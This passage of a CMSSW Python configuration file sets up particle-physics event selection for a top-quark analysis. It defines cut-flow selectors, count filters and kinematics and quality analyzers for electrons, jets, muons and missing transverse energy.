PhysicsTools.PatAlgos.selectionLayer1.jetCountFilter_cfi import *\n## process.jetSelection1 = countLayer1Jets.clone(src = 'jetsCF2', \n## minNumber = 2\n## )\n\n## ## sequence with filter for optimal jets --> muon analysis\n## from PhysicsTools.PatAlgos.selectionLayer1.jetCountFilter_cfi import *\n## process.jetSelection2 = countLayer1Jets.clone(src = 'jetsCF3HighPur', \n## minNumber = 1\n## )\n\n\n## ---\n## efficiency calculation event counting cuts\n## ---\n\n## sequence with filter for optimal electrons \nfrom PhysicsTools.PatAlgos.selectionLayer1.electronCountFilter_cfi import *\nprocess.elecSelIdPtEta = countLayer1Electrons.clone(src = 'electronCF2',\n minNumber = 1,\n maxNumber = 1\n )\n## sequence with filter for optimal electrons \nfrom PhysicsTools.PatAlgos.selectionLayer1.electronCountFilter_cfi import *\nprocess.elecSelRelIso = countLayer1Electrons.clone(src = 'electronCF3',\n minNumber = 1,\n maxNumber = 1\n )\n\n\n\n## sequence with filter for optimal jets \nfrom PhysicsTools.PatAlgos.selectionLayer1.jetCountFilter_cfi import *\nprocess.jetSelPtEtaEmf = countLayer1Jets.clone(src = 'jetsCF2', \n minNumber = 2\n )\n## sequence with filter for optimal jets \nfrom PhysicsTools.PatAlgos.selectionLayer1.jetCountFilter_cfi import *\nprocess.jetSelBtag = countLayer1Jets.clone(src = 'jetsCF3HighPur', \n minNumber = 1\n )\n\n## 
\nprocess.selectedLayer1MET = cms.EDFilter(\"PATMETSelector\",\n src = cms.InputTag(\"layer1METs\"),\n cut = cms.string('et>=30.')\n)\n\nprocess.selectEventsWithMET = cms.EDFilter(\"PATCandViewCountFilter\",\n minNumber = cms.uint32(1),\n maxNumber = cms.uint32(999999),\n src = cms.InputTag(\"selectedLayer1MET\")\n)\n\n## sequence with filter for optimal muon \nfrom PhysicsTools.PatAlgos.selectionLayer1.muonCountFilter_cfi import *\nprocess.muonSelStAl = countLayer1Muons.clone(src = 'muonCF1StAl', \n minNumber = 1 \n )\n\n## sequence with filter for optimal muon \nfrom PhysicsTools.PatAlgos.selectionLayer1.muonCountFilter_cfi import *\nprocess.muonSelComb = countLayer1Muons.clone(src = 'muonCF1Comb', \n minNumber = 1 \n )\n\n\n## sequence with filter for optimal muon \nfrom PhysicsTools.PatAlgos.selectionLayer1.muonCountFilter_cfi import *\nprocess.muonSelTrkiso = countLayer1Muons.clone(src = 'combTrkiso', # !!!\n minNumber = 1 \n )\nprocess.muonSelReliso = countLayer1Muons.clone(src = 'combReliso', # !!!\n minNumber = 1 \n )\nprocess.muonSelCaliso = countLayer1Muons.clone(src = 'combCaliso', # !!!\n minNumber = 1 \n )\n\n\n\n## sequence with filter for optimal muon \nfrom PhysicsTools.PatAlgos.selectionLayer1.muonCountFilter_cfi import *\nprocess.muonSelEcalHcal = countLayer1Muons.clone(src = 'combEcalHcal', \n minNumber = 1 \n )\n## sequence with filter for optimal muon \nfrom PhysicsTools.PatAlgos.selectionLayer1.muonCountFilter_cfi import *\n##process.muonSelTrackMu = countLayer1Muons.clone(src = 'combValhitChi2Trksig', \n## minNumber = 1 \n## )\n\nprocess.muonSelValhit = countLayer1Muons.clone(src = 'combValhit', \n minNumber = 1 \n )\n\nprocess.muonSelChi2 = countLayer1Muons.clone(src = 'combChi2', \n minNumber = 1 \n )\n\nprocess.muonSelTrksig = countLayer1Muons.clone(src = 'combTrksig', \n minNumber = 1 \n )\n\n\n## ---\n## define selection\n## ---\n\n## electron selection\nprocess.load(\"TopAnalysis.TopFilter.sequences.electronSelection_cff\")\n\nfrom TopAnalysis.TopFilter.sequences.electronSelection_cff import centralElectrons\nprocess.centralElectrons = centralElectrons\n\nfrom TopAnalysis.TopFilter.sequences.electronSelection_cff import highPtElectrons\nprocess.highPtElectrons = highPtElectrons\n\nfrom TopAnalysis.TopFilter.sequences.electronSelection_cff import tightElectrons\nprocess.tightElectrons = tightElectrons\n\n\n\n## jet selection\nprocess.load(\"TopAnalysis.TopFilter.sequences.jetSelection_cff\")\n\nfrom TopAnalysis.TopFilter.sequences.jetSelection_cff import reliableJets\nprocess.reliableJets = reliableJets\n\nfrom TopAnalysis.TopFilter.sequences.jetSelection_cff import centralJets\nprocess.centralJets = centralJets\n\nfrom TopAnalysis.TopFilter.sequences.jetSelection_cff import goodJets\nprocess.goodJets = goodJets\n\n\n\n## muon selection\nprocess.load(\"TopAnalysis.TopFilter.sequences.muonSelection_cff\")\n\nfrom TopAnalysis.TopFilter.sequences.muonSelection_cff import standAloneMuons\nprocess.standAloneMuons = standAloneMuons\n\n\n## ---\n## define monitoring\n## ---\n\n\n## ---\n## electron kinematics analyzer\n## ---\nprocess.load(\"TopAnalysis.TopFilter.sequences.electronSelection_cff\")\nprocess.load(\"TopAnalysis.TopAnalyzer.ElectronKinematics_cfi\")\n\n\n\n## CUT FLOW electrons\nfrom PhysicsTools.PatAlgos.selectionLayer1.electronSelector_cfi import *\n\nprocess.electronCF2 = selectedLayer1Electrons.clone(src = 'selectedLayer1Electrons', \n cut = 'electronID(\\\"eidRobustTight\\\") > 0.99 &'\n 'abs(eta) < 1.5 & et > 20.'\n )\nprocess.electronCF3 = 
selectedLayer1Electrons.clone(src = 'electronCF2', \n cut = '(trackIso+caloIso)/et < 0.1'\n )\n\n## 1. leading electron before any cut (selLay1): cut flow analysis CF0\nprocess.eleKin_1st_CF0_selLay1 = process.analyzeElectronKinematics.clone(src = 'selectedLayer1Electrons',\n analyze = cms.PSet(index = cms.int32(0))\n )\n## 1. leading electron with 1.cut (electronId: robust tight): cut flow analysis CF1\nprocess.eleKin_1st_CF1_roTigh = process.analyzeElectronKinematics.clone(src = 'idOnlyElectrons',\n analyze = cms.PSet(index = cms.int32(0))\n )\n## 1. leading electron with 2.cut (robust tight & abs(eta)<1.5 & et>20 ): cut flow analysis CF2 recap electron before isolation\nprocess.eleKin_1st_CF2_ptEta = process.analyzeElectronKinematics.clone(src = 'electronCF2',\n analyze = cms.PSet(index = cms.int32(0))\n )\n## 1. leading electron after with 3. cut (rob. tight & abs(eta)<1.5 & et>20 & relIso<0.1 ): CF3 recap electron after isolation\nprocess.eleKin_1st_CF3_relIso = process.analyzeElectronKinematics.clone(src = 'electronCF3',\n analyze = cms.PSet(index = cms.int32(0))\n )\n\n## define sequence\nprocess.monitorElectronKinematics = cms.Sequence(process.eleKin_1st_CF0_selLay1 +\n process.eleKin_1st_CF1_roTigh +\n process.eleKin_1st_CF2_ptEta +\n process.eleKin_1st_CF3_relIso \n )\n\n### clones for after all cuts (aac)\n\n## 1. leading electron before any cut (selLay1): cut flow analysis CF0\nprocess.eleKin_1st_CF0_selLay1_aac = process.eleKin_1st_CF0_selLay1.clone()\n\n\n## 1. leading electron with 1.cut (electronId: robust tight): cut flow analysis CF1\nprocess.eleKin_1st_CF1_roTigh_aac = process.eleKin_1st_CF1_roTigh.clone()\n\n\n## 1. leading electron with 2.cut (robust tight & abs(eta)<1.5 & et>20 ): cut flow analysis CF2 recap electron before isolation\nprocess.eleKin_1st_CF2_ptEta_aac = process.eleKin_1st_CF2_ptEta.clone()\n\n\n## 1. leading electron after with 3. cut (rob. tight & abs(eta)<1.5 & et>20 & relIso<0.1 ): CF3 recap electron after isolation\nprocess.eleKin_1st_CF3_relIso_aac = process.eleKin_1st_CF3_relIso.clone()\n\n\n\n## define sequence: clones for after all cuts (aac\nprocess.monitorElectronKinematics_aac = cms.Sequence(process.eleKin_1st_CF0_selLay1_aac +\n process.eleKin_1st_CF1_roTigh_aac +\n process.eleKin_1st_CF2_ptEta_aac +\n process.eleKin_1st_CF3_relIso_aac \n )\n\n\n## ---\n## electron quality analyzer\n## ---\nprocess.load(\"TopAnalysis.TopAnalyzer.ElectronQuality_cfi\")\n\n\n## 1. lead. electron with no restriction (selectedLayer1) CF0\nprocess.eleID_1st_CF0 = process.analyzeElectronQuality.clone (src = 'selectedLayer1Electrons',\n analyze = cms.PSet(index = cms.int32(0))\n )\n## 1. lead. electron after restriction in electronID CF1\nprocess.eleID_1st_CF1 = process.analyzeElectronQuality.clone (src = 'idOnlyElectrons',\n analyze = cms.PSet(index = cms.int32(0))\n )\n\n## 1. lead. electron after with restriction in electronID & eta and pt \nprocess.eleID_1st_CF2 = process.analyzeElectronQuality.clone (src = 'electronCF2',\n analyze = cms.PSet(index = cms.int32(0))\n )\n## 1. lead. electron with restriction in electronID & eta and pt & rel.isolation\nprocess.eleID_1st_CF3 = process.analyzeElectronQuality.clone (src = 'electronCF3',\n analyze = cms.PSet(index = cms.int32(0))\n )\n## define sequence\nprocess.monitorElectronQuality = cms.Sequence(process.eleID_1st_CF0 +\n process.eleID_1st_CF1 +\n process.eleID_1st_CF2 +\n process.eleID_1st_CF3 \n )\n\n\n## ---\n## electron quality analyzer aac\n## ---\n\n## 1. lead. 
electron with no restriction (selectedLayer1) CF0\nprocess.eleID_1st_CF0_aac = process.eleID_1st_CF0.clone()\n\n\n## 1. lead. electron after restriction in electronID CF1\nprocess.eleID_1st_CF1_aac = process.eleID_1st_CF1.clone()\n\n\n## 1. lead. electron after with restriction in electronID & eta and pt \nprocess.eleID_1st_CF2_aac = process.eleID_1st_CF2.clone()\n\n\n## 1. lead. electron with restriction in electronID & eta and pt & rel.isolation\nprocess.eleID_1st_CF3_aac = process.eleID_1st_CF3.clone()\n\n\n## define sequence\nprocess.monitorElectronQuality_aac = cms.Sequence(process.eleID_1st_CF0_aac +\n process.eleID_1st_CF1_aac +\n process.eleID_1st_CF2_aac +\n process.eleID_1st_CF3_aac \n )\n\n\n\n\n\n\n## CUT FLOW jets\nfrom PhysicsTools.PatAlgos.selectionLayer1.jetSelector_cfi import *\n\nprocess.jetsCF1 = selectedLayer1Jets.clone(src = 'selectedLayer1Jets', \n cut = 'abs(eta)<3 & pt>20'\n )\n\nprocess.jetsCF2 = selectedLayer1Jets.clone(src = 'jetsCF1', \n cut = '0.05 < emEnergyFraction &'\n '0.95 > emEnergyFraction'\n )\n\nprocess.jetsCF3HighPur = selectedLayer1Jets.clone(src = 'jetsCF2', \n cut = 'bDiscriminator(\\\"trackCountingHighPurBJetTags\\\") > 3.0'\n )\n\nprocess.jetsCF3HighEff = selectedLayer1Jets.clone(src = 'jetsCF2', \n cut = 'bDiscriminator(\\\"trackCountingHighEffBJetTags\\\") > 3.0'\n )\n\n\n\nprocess.bJetsCF2 = selectedLayer1Jets.clone(src = 'selectedLayer1Jets', \n cut = 'abs(partonFlavour)==5 &'\n 'abs(eta)<3 & pt>20 &'\n '0.05 < emEnergyFraction &'\n '0.95 > emEnergyFraction'\n )\n\nprocess.lightQJetsCF2 = selectedLayer1Jets.clone(src = 'selectedLayer1Jets', \n cut = 'abs(partonFlavour)!=5 & abs(partonFlavour)!=4 &'\n 'abs(eta)<3 & pt>20 &'\n '0.05 < emEnergyFraction &'\n '0.95 > emEnergyFraction'\n )\n\n## ---\n## jet kinematics analyzer\n## ---\nprocess.load(\"TopAnalysis.TopAnalyzer.JetKinematics_cfi\")\n\n\n## 1. leading jet before any cut\nprocess.jetKin_1st_CF0_selLay1 = process.analyzeJetKinematics.clone (src = 'selectedLayer1Jets',\n analyze = cms.PSet(index = cms.int32(0), correctionLevel = cms.string('abs' ) )\n )\n## 2. leading jet before any cut\nprocess.jetKin_2nd_CF0_selLay1 = process.analyzeJetKinematics.clone (src = 'selectedLayer1Jets',\n analyze = cms.PSet(index = cms.int32(1), correctionLevel = cms.string('abs' ) )\n )\n## all jets before any cut\nprocess.jetKin_all_CF0_selLay1 = process.analyzeJetKinematics.clone (src = 'selectedLayer1Jets',\n analyze = cms.PSet(index = cms.int32(-1), correctionLevel = cms.string('abs' ) )\n )\n\n\n## 1. leading jet after restriction in pt & eta\nprocess.jetKin_1st_CF1_ptEta = process.analyzeJetKinematics.clone (src = 'jetsCF1',\n analyze = cms.PSet(index = cms.int32(0), correctionLevel = cms.string('abs' ) )\n )\n## 2. leading jet after restriction in pt & eta\nprocess.jetKin_2nd_CF1_ptEta = process.analyzeJetKinematics.clone (src = 'jetsCF1',\n analyze = cms.PSet(index = cms.int32(1), correctionLevel = cms.string('abs' ) )\n )\n## all jets after restriction in pt & eta\nprocess.jetKin_all_CF1_ptEta = process.analyzeJetKinematics.clone (src = 'jetsCF1',\n analyze = cms.PSet(index = cms.int32(-1), correctionLevel = cms.string('abs' ) )\n )\n\n\n\n## 1. leading jet after restriction in pt & eta & emf leading jet mult before b-discr.\nprocess.jetKin_1st_CF2_emf = process.analyzeJetKinematics.clone (src = 'jetsCF2', \n analyze = cms.PSet(index = cms.int32(0), correctionLevel = cms.string('abs' ) )\n )\n## 2. 
leading jet after restriction in pt & eta & emf 2nd jet mult before b-discr.\nprocess.jetKin_2nd_CF2_emf = process.analyzeJetKinematics.clone (src = 'jetsCF2',\n analyze = cms.PSet(index = cms.int32(1), correctionLevel = cms.string('abs' ) )\n )\n## all jets after restriction in pt & eta & emf 2nd jet mult before b-discr.\nprocess.jetKin_all_CF2_emf = process.analyzeJetKinematics.clone (src = 'jetsCF2',\n analyze = cms.PSet(index = cms.int32(-1), correctionLevel = cms.string('abs' ) )\n )\n\n\n\n\n## 1. leading jet after restriction in pt & eta & emf & b-discriminator leading jet mult after b-discr.\nprocess.jetKin_1st_CF3_highPur = process.analyzeJetKinematics.clone (src = 'jetsCF3HighPur',\n analyze = cms.PSet(index = cms.int32(0), correctionLevel = cms.string('abs' ) )\n )\n## 2. leading jet after restriction in pt & eta & emf & b-discriminator 2nd jet mult after b-discr.\nprocess.jetKin_2nd_CF3_highPur = process.analyzeJetKinematics.clone (src = 'jetsCF3HighPur',\n analyze = cms.PSet(index = cms.int32(1), correctionLevel = cms.string('abs' ) )\n )\n## all jets after restriction in pt & eta & emf & b-discriminator 2nd jet mult after b-discr.\nprocess.jetKin_all_CF3_highPur = process.analyzeJetKinematics.clone (src = 'jetsCF3HighPur',\n analyze = cms.PSet(index = cms.int32(-1), correctionLevel = cms.string('abs' ) )\n )\n\n\n\n## define sequence\nprocess.monitorJetKinematics = cms.Sequence(process.jetKin_1st_CF0_selLay1 +\n process.jetKin_2nd_CF0_selLay1 +\n process.jetKin_all_CF0_selLay1 +\n \n process.jetKin_1st_CF1_ptEta +\n process.jetKin_2nd_CF1_ptEta +\n process.jetKin_all_CF1_ptEta +\n \n process.jetKin_1st_CF2_emf +\n process.jetKin_2nd_CF2_emf +\n process.jetKin_all_CF2_emf +\n \n process.jetKin_1st_CF3_highPur +\n process.jetKin_2nd_CF3_highPur +\n process.jetKin_all_CF3_highPur\n )\n\n\n\n## ---\n## jet kinematics analyzer aac\n## ---\n\n\n## 1. leading jet before any cut aac\nprocess.jetKin_1st_CF0_selLay1_aac = process.jetKin_1st_CF0_selLay1.clone()\n\n## 2. leading jet before any cut aac\nprocess.jetKin_2nd_CF0_selLay1_aac = process.jetKin_2nd_CF0_selLay1.clone()\n\n## all jets before any cut aac\nprocess.jetKin_all_CF0_selLay1_aac = process.jetKin_all_CF0_selLay1.clone()\n\n\n## 1. leading jet after restriction in pt & eta aac\nprocess.jetKin_1st_CF1_ptEta_aac = process.jetKin_1st_CF1_ptEta.clone()\n\n## 2. leading jet after restriction in pt & eta aac\nprocess.jetKin_2nd_CF1_ptEta_aac = process.jetKin_2nd_CF1_ptEta.clone()\n\n## all jets after restriction in pt & eta aac\nprocess.jetKin_all_CF1_ptEta_aac = process.jetKin_all_CF1_ptEta.clone()\n\n\n\n## 1. leading jet after restriction in pt & eta & emf aac leading jet mult before b-discr.\nprocess.jetKin_1st_CF2_emf_aac = process.jetKin_1st_CF2_emf.clone()\n\n## 2. leading jet after restriction in pt & eta & emf aac 2nd jet mult before b-discr.\nprocess.jetKin_2nd_CF2_emf_aac = process.jetKin_2nd_CF2_emf.clone()\n\n## all jets after restriction in pt & eta & emf aac 2nd jet mult before b-discr.\nprocess.jetKin_all_CF2_emf_aac = process.jetKin_all_CF2_emf.clone()\n\n\n\n## 1. leading jet after restriction in pt & eta & emf & b-discriminator aac leading jet mult after b-discr.\nprocess.jetKin_1st_CF3_highPur_aac = process.jetKin_1st_CF3_highPur.clone()\n\n## 2. 
leading jet after restriction in pt & eta & emf & b-discriminator aac 2nd jet mult after b-discr.\nprocess.jetKin_2nd_CF3_highPur_aac = process.jetKin_2nd_CF3_highPur.clone()\n\n## all jets after restriction in pt & eta & emf & b-discriminator aac 2nd jet mult after b-discr.\nprocess.jetKin_all_CF3_highPur_aac = process.jetKin_all_CF3_highPur.clone()\n\n\n\n\n## define sequence\nprocess.monitorJetKinematics_aac = cms.Sequence(process.jetKin_1st_CF0_selLay1_aac +\n process.jetKin_2nd_CF0_selLay1_aac +\n process.jetKin_all_CF0_selLay1_aac +\n \n process.jetKin_1st_CF1_ptEta_aac +\n process.jetKin_2nd_CF1_ptEta_aac +\n process.jetKin_all_CF1_ptEta_aac +\n \n process.jetKin_1st_CF2_emf_aac +\n process.jetKin_2nd_CF2_emf_aac +\n process.jetKin_all_CF2_emf_aac +\n \n process.jetKin_1st_CF3_highPur_aac +\n process.jetKin_2nd_CF3_highPur_aac +\n process.jetKin_all_CF3_highPur_aac\n )\n\n\n## ---\n## jet quality analyzer\n## ---\nprocess.load(\"TopAnalysis.TopAnalyzer.JetQuality_cfi\")\n\n## 1. leading jet w/o any restriction (selLay1) CF0\nprocess.jetID_1st_CF0 = process.analyzeJetQuality.clone (src = 'selectedLayer1Jets',\n analyze = cms.PSet(index = cms.int32(0), flavor = cms.string('uds' ) )\n )\n\n## 2. leading jet w/o any restriction (selLay1) CF0\nprocess.jetID_2nd_CF0 = process.analyzeJetQuality.clone (src = 'selectedLayer1Jets',\n analyze = cms.PSet(index = cms.int32(1), flavor = cms.string('uds' ) )\n )\n\n## all jet w/o any restriction (selLay1) CF0\nprocess.jetID_all_CF0 = process.analyzeJetQuality.clone (src = 'selectedLayer1Jets',\n analyze = cms.PSet(index = cms.int32(-1), flavor = cms.string('uds' ) )\n )\n\n\n\n## 1. leading jet after restriction in eta and pt CF1\nprocess.jetID_1st_CF1 = process.analyzeJetQuality.clone (src = 'jetsCF1',\n analyze = cms.PSet(index = cms.int32(0), flavor = cms.string('uds' ) )\n )\n\n## 2. leading jet after restriction in eta and pt CF1\nprocess.jetID_2nd_CF1 = process.analyzeJetQuality.clone (src = 'jetsCF1',\n analyze = cms.PSet(index = cms.int32(1), flavor = cms.string('uds' ) )\n )\n## all jets after restriction in eta and pt CF1\nprocess.jetID_all_CF1 = process.analyzeJetQuality.clone (src = 'jetsCF1',\n analyze = cms.PSet(index = cms.int32(-1), flavor = cms.string('uds' ) )\n )\n\n\n\n## 1. leading jet after restriction in eta, pt and emf CF2\nprocess.jetID_1st_CF2 = process.analyzeJetQuality.clone (src = 'jetsCF2',\n analyze = cms.PSet(index = cms.int32(0), flavor = cms.string('uds' ) )\n )\n## 2. leading jet after restriction in eta, pt and emf CF2\nprocess.jetID_2nd_CF2 = process.analyzeJetQuality.clone (src = 'jetsCF2',\n analyze = cms.PSet(index = cms.int32(1), flavor = cms.string('uds' ) )\n )\n## all jets after restriction in eta, pt and emf CF2\nprocess.jetID_all_CF2 = process.analyzeJetQuality.clone (src = 'jetsCF2',\n analyze = cms.PSet(index = cms.int32(-1), flavor = cms.string('uds' ) )\n )\n\n\n\n\n## 1. leading bQJet with restr. in eta, pt and emf bQCF2\nprocess.jetID_1st_bQCF2 = process.analyzeJetQuality.clone (src = 'bJetsCF2',\n analyze = cms.PSet(index = cms.int32(0), flavor = cms.string('uds' ) )\n )\n## 2. leading bQJet with restr. in eta, pt and emf bQCF2\nprocess.jetID_2nd_bQCF2 = process.analyzeJetQuality.clone (src = 'bJetsCF2',\n analyze = cms.PSet(index = cms.int32(1), flavor = cms.string('uds' ) )\n )\n## all bQJet with restr. in eta, pt and emf bQCF2\nprocess.jetID_all_bQCF2 = process.analyzeJetQuality.clone (src = 'bJetsCF2',\n analyze = cms.PSet(index = cms.int32(-1), flavor = cms.string('uds' ) )\n )\n\n\n\n## 1. 
leading lightQJet with restr. in eta, pt and emf lightQCF2\nprocess.jetID_1st_lightQCF2 = process.analyzeJetQuality.clone (src = 'lightQJetsCF2',\n analyze = cms.PSet(index = cms.int32(0), flavor = cms.string('uds' ) )\n )\n\n## 2. leading lightQJet with restr. in eta, pt and emf lightQCF2\nprocess.jetID_2nd_lightQCF2 = process.analyzeJetQuality.clone (src = 'lightQJetsCF2',\n analyze = cms.PSet(index = cms.int32(1), flavor = cms.string('uds' ) )\n )\n## all lightQJet with restr. in eta, pt and emf lightQCF2\nprocess.jetID_all_lightQCF2 = process.analyzeJetQuality.clone (src = 'lightQJetsCF2',\n analyze = cms.PSet(index = cms.int32(-1), flavor = cms.string('uds' ) )\n )\n\n\n\n## define sequence\nprocess.monitorJetQuality = cms.Sequence(process.jetID_1st_CF0 +\n process.jetID_2nd_CF0 +\n process.jetID_all_CF0 +\n \n process.jetID_1st_CF1 +\n process.jetID_2nd_CF1 +\n process.jetID_all_CF1 +\n \n process.jetID_1st_CF2 +\n process.jetID_2nd_CF2 +\n process.jetID_all_CF2 +\n \n process.jetID_1st_bQCF2 +\n process.jetID_2nd_bQCF2 +\n process.jetID_all_bQCF2 +\n \n process.jetID_1st_lightQCF2 +\n process.jetID_2nd_lightQCF2 +\n process.jetID_all_lightQCF2\n )\n\n## ---\n## jet quality analyzer aac\n## ---\n\n\n## 1. leading jet w/o any restriction (selLay1) CF0\nprocess.jetID_1st_CF0_aac = process.jetID_1st_CF0.clone()\n\n## 2. leading jet w/o any restriction (selLay1) CF0\nprocess.jetID_2nd_CF0_aac = process.jetID_2nd_CF0.clone()\n\n## all jets w/o any restriction (selLay1) CF0\nprocess.jetID_all_CF0_aac = process.jetID_all_CF0.clone()\n\n\n\n## 1. leading jet after restriction in eta and pt CF1\nprocess.jetID_1st_CF1_aac = process.jetID_1st_CF1.clone()\n\n## 2. leading jet after restriction in eta and pt CF1\nprocess.jetID_2nd_CF1_aac = process.jetID_2nd_CF1.clone()\n\n## all jets after restriction in eta and pt CF1\nprocess.jetID_all_CF1_aac = process.jetID_all_CF1.clone()\n\n\n\n## 1. leading jet after restriction in eta, pt and emf CF2\nprocess.jetID_1st_CF2_aac = process.jetID_1st_CF2.clone()\n\n## 2. leading jet after restriction in eta, pt and emf CF2\nprocess.jetID_2nd_CF2_aac = process.jetID_2nd_CF2.clone()\n\n## all jets after restriction in eta, pt and emf CF2\nprocess.jetID_all_CF2_aac = process.jetID_all_CF2.clone()\n\n\n\n## 1. leading bQJet with restr. in eta, pt and emf bQCF2\nprocess.jetID_1st_bQCF2_aac = process.jetID_1st_bQCF2.clone()\n\n## 2. leading bQJet with restr. in eta, pt and emf bQCF2\nprocess.jetID_2nd_bQCF2_aac = process.jetID_2nd_bQCF2.clone()\n\n## all bQJets with restr. in eta, pt and emf bQCF2\nprocess.jetID_all_bQCF2_aac = process.jetID_all_bQCF2.clone()\n\n\n\n## 1. leading lightQJet with restr. in eta, pt and emf lightQCF2\nprocess.jetID_1st_lightQCF2_aac = process.jetID_1st_lightQCF2.clone()\n\n## 2. leading lightQJet with restr. in eta, pt and emf lightQCF2\nprocess.jetID_2nd_lightQCF2_aac = process.jetID_2nd_lightQCF2.clone()\n\n## all lightQJet with restr. 
in eta, pt and emf lightQCF2\nprocess.jetID_all_lightQCF2_aac = process.jetID_all_lightQCF2.clone()\n\n\n\n## define sequence\nprocess.monitorJetQuality_aac = cms.Sequence(process.jetID_1st_CF0_aac +\n process.jetID_2nd_CF0_aac +\n process.jetID_all_CF0_aac +\n \n process.jetID_1st_CF1_aac +\n process.jetID_2nd_CF1_aac +\n process.jetID_all_CF1_aac +\n \n process.jetID_1st_CF2_aac +\n process.jetID_2nd_CF2_aac +\n process.jetID_all_CF2_aac +\n \n process.jetID_1st_bQCF2_aac +\n process.jetID_2nd_bQCF2_aac +\n process.jetID_all_bQCF2_aac +\n \n process.jetID_1st_lightQCF2_aac +\n process.jetID_2nd_lightQCF2_aac +\n process.jetID_all_lightQCF2_aac \n )\n\n## loade METKinematicsAnalyzer\nprocess.load(\"TopAnalysis.TopAnalyzer.METKinematics_cfi\")\n\n\n## CUT FLOW muon\nfrom PhysicsTools.PatAlgos.selectionLayer1.muonSelector_cfi import *\n\n\nprocess.muonCF0 = selectedLayer1Muons.clone(src = 'selectedLayer1Muons', \n cut = '' \n )\n\nprocess.muonCF1StAl = selectedLayer1Muons.clone(src = 'muonCF0', \n cut = 'standAloneMuon.isNull = 0' \n )\n\nprocess.muonCF1Comb = selectedLayer1Muons.clone(src = 'muonCF0', \n cut = 'combinedMuon.isNull = 0' \n )\n\n\n\n## ---\n## muon kinematics analyzer\n## ---\nprocess.load(\"TopAnalysis.TopAnalyzer.MuonKinematics_cfi\")\n\n## 1. leading muon with standAlone restriction\nprocess.muonKin_1st_CF0 = process.analyzeMuonKinematics.clone(src='muonCF0',\n analyze = cms.PSet(index = cms.int32(0))\n )\n\nprocess.muonKin_1st_CF1StAl = process.analyzeMuonKinematics.clone(src='muonCF1StAl',\n analyze = cms.PSet(index = cms.int32(0))\n )\n\nprocess.muonKin_1st_CF1Comb = process.analyzeMuonKinematics.clone(src='muonCF1Comb',\n\n analyze = cms.PSet(index = cms.int32(0))\n )\n\nprocess.muonKin = cms.Sequence(process.muonKin_1st_CF0 +\n process.muonKin_1st_CF1StAl +\n process.muonKin_1st_CF1Comb\n )\n\n\n\nprocess.muonKin_1st_CF0_aac = process.muonKin_1st_CF0.clone()\n\nprocess.muonKin_1st_CF1StAl_aac = process.muonKin_1st_CF1StAl.clone()\n\nprocess.muonKin_1st_CF1Comb_aac = process.muonKin_1st_CF1Comb.clone()\n\n\nprocess.muonKin_aac = cms.Sequence(process.muonKin_1st_CF0_aac +\n process.muonKin_1st_CF1StAl_aac +\n process.muonKin_1st_CF1Comb_aac\n )\n\n\n\n\n## ---\n## muon quality analyzer \n## ---\nprocess.load(\"TopAnalysis.TopAnalyzer.MuonQuality_cfi\")\n\nprocess.muonID_1st_CF0 = process.analyzeMuonQuality.clone (src = 'muonCF0',\n analyze = cms.PSet(index = cms.int32(0) )\n )\n\nprocess.muonID_1st_CF1Comb = process.analyzeMuonQuality.clone (src = 'muonCF1Comb',\n analyze = cms.PSet(index = cms.int32(0) )\n )\n\n\nprocess.muonID = cms.Sequence(process.muonID_1st_CF0 +\n ##process.muonID_1st_CF1StAl +\n process.muonID_1st_CF1Comb\n )\n\n\n## ---\n## muon quality analyzer aac\n## ---\n\nprocess.muonID_1st_CF0_aac = process.muonID_1st_CF0.clone()\n\nprocess.muonID_1st_CF1Comb_aac = process.muonID_1st_CF1Comb.clone()\n\n\nprocess.muonID_aac = cms.Sequence(process.muonID_1st_CF0_aac +\n ##process.muonID_1st_CF1StAl_aac +\n process.muonID_1st_CF1Comb_aac\n )\n\n\n\n## ---\n## probe efficiency analysis, to be applied after combined muon\n## ---\n\n\n\n## CUT FLOW muon for effiecincy analysis probe --> test\n\nprocess.comb = selectedLayer1Muons.clone(src = 'muonCF0', \n cut = 'combinedMuon.isNull = 0 &'\n '(trackIso+caloIso)/pt < 0.05'\n )\n\nprocess.combValhit = selectedLayer1Muons.clone(src = 'comb', \n cut = 'track.numberOfValidHits >= 11'\n )\n\nprocess.combChi2 = selectedLayer1Muons.clone(src = 'comb', \n cut = 'combinedMuon.normalizedChi2 < 10.0'\n 
)\n\nprocess.combTrksig = selectedLayer1Muons.clone(src = 'comb', \n cut = 'abs(dB) < 0.02'\n )\n\n\nprocess.combValhitChi2Trksig = selectedLayer1Muons.clone(src = 'comb', \n cut = 'track.numberOfValidHits >= 11 &'\n 'combinedMuon.normalizedChi2 < 10.0 &'\n 'abs(dB) < 0.02'\n )\n## trackMu = combValhitChi2Trksig\n\n\nprocess.trackMuEcal = selectedLayer1Muons.clone(src = 'combValhitChi2Trksig', \n cut = 'ecalIsoDeposit.candEnergy < 4' \n )\n\nprocess.trackMuHcal = selectedLayer1Muons.clone(src = 'combValhitChi2Trksig', \n cut = 'hcalIsoDeposit.candEnergy < 6' \n )\n\nprocess.trackMuEcalHcal = selectedLayer1Muons.clone(src = 'combValhitChi2Trksig', \n cut = 'ecalIsoDeposit.candEnergy < 4 &'\n 'hcalIsoDeposit.candEnergy < 6' \n )\n\n\nprocess.trackMuTrkiso = selectedLayer1Muons.clone(src = 'combValhitChi2Trksig', \n cut = 'trackIso < 1.' \n )\n\nprocess.trackMuCaliso = selectedLayer1Muons.clone(src = 'combValhitChi2Trksig', \n cut = 'caloIso < 5.' \n )\n\nprocess.trackMuReliso = selectedLayer1Muons.clone(src = 'combValhitChi2Trksig', \n cut = '(trackIso+caloIso)/pt < 0.05' \n )\n\n\n\nprocess.combEcal = selectedLayer1Muons.clone(src = 'comb', \n cut = 'ecalIsoDeposit.candEnergy < 4' \n )\n\nprocess.combHcal = selectedLayer1Muons.clone(src = 'comb', \n cut = 'hcalIsoDeposit.candEnergy < 6' \n )\n\nprocess.combEcalHcal = selectedLayer1Muons.clone(src = 'comb', \n cut = 'ecalIsoDeposit.candEnergy < 4 &'\n 'hcalIsoDeposit.candEnergy < 6' \n )\n\nprocess.combEcalHcalTrkiso = selectedLayer1Muons.clone(src = 'combEcalHcal', \n cut = 'trackIso < 1.'\n )\n\nprocess.combEcalHcalCaliso = selectedLayer1Muons.clone(src = 'combEcalHcal', \n cut = 'caloIso < 5.'\n )\n\nprocess.combEcalHcalReliso = selectedLayer1Muons.clone(src = 'combEcalHcal', \n cut = '(trackIso+caloIso)/pt < 0.05'\n )\n \n\n\nprocess.combTrkiso = selectedLayer1Muons.clone(src = 'comb', \n cut = 'trackIso < 1.' # !!! \n )\n\nprocess.combCaliso = selectedLayer1Muons.clone(src = 'comb', \n cut = 'caloIso < 5.' # !!!\n 